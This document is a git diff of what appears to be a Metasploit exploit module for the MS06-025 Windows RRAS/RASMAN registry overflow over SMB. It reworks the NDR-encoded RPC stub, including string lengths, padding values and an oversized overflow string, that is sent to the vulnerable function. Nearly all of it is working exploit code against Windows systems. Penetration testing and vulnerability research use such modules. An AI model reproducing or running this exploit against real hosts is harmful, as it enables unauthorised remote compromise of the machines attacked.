diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 7fae9c8d6c..45d0555795 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -54,64 +54,60 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") + + fuxorstring = "G" * 514 + #fuxorstring = "G" * 212 + "\\\\" + "g" * 42 + #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion" type2 = - NDR.wstring("A" * 34) + # 34 length - NDR.wstring("B" * 258) + # 258 length - NDR.wstring("C" * 258) + # 258 length - NDR.long(1) + - NDR.long(1) + NDR.UnicodeConformantVaryingString("A" * 16) + # 34 length, UNMIDL 17 + NDR.UnicodeConformantVaryingString("B" * 128) + # 258 length, UNMIDL 129 + NDR.UnicodeConformantVaryingString("C" * 128) + # 258 length, UNMIDL 129 + NDR.long(4) + + NDR.long(4) - #fuxorstring = "G" * 212 + "\\\\" + "g" * 43 - #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion" - fuxorstring = "G" * 552 type1 = - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + - NDR.long(1) + type2 + # unique type 2 + NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc + NDR.UnicodeConformantVaryingString("D" * 127) + # 258 length, UNMIDL 129 + NDR.long(4) + + NDR.UnicodeConformantVaryingString("E" * 259) + # 520 length, UNMIDL 260 + NDR.UnicodeConformantVaryingString("F" * 259) + # 520 length, UNMIDL 260 - NDR.wstring("D" * 258) + # 258 length + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + - NDR.long(1) + - - NDR.wstring("E" * 520) + # 520 length - #NDR.wstring("F" * 86 + "\\" + "f" * 86 + "\\" + "F" * 86) + # 260 length - NDR.wstring("F" * 520) + # 520 length - - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - - #NDR.wstring(Rex::Text.pattern_create(257)) + # 257 length - NDR.wstring(fuxorstring) + # 514 length + NDR.UnicodeConformantVaryingString("G" * 256) + # 514 length, UNMIDL 257 - NDR.long(0) + - NDR.long(0) + NDR.long(4) + + NDR.long(4) - stubdata = type1 + NDR.long(1) - + stubdata = type1 + NDR.long(4) + print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') print_status('Calling the vulnerable function...') begin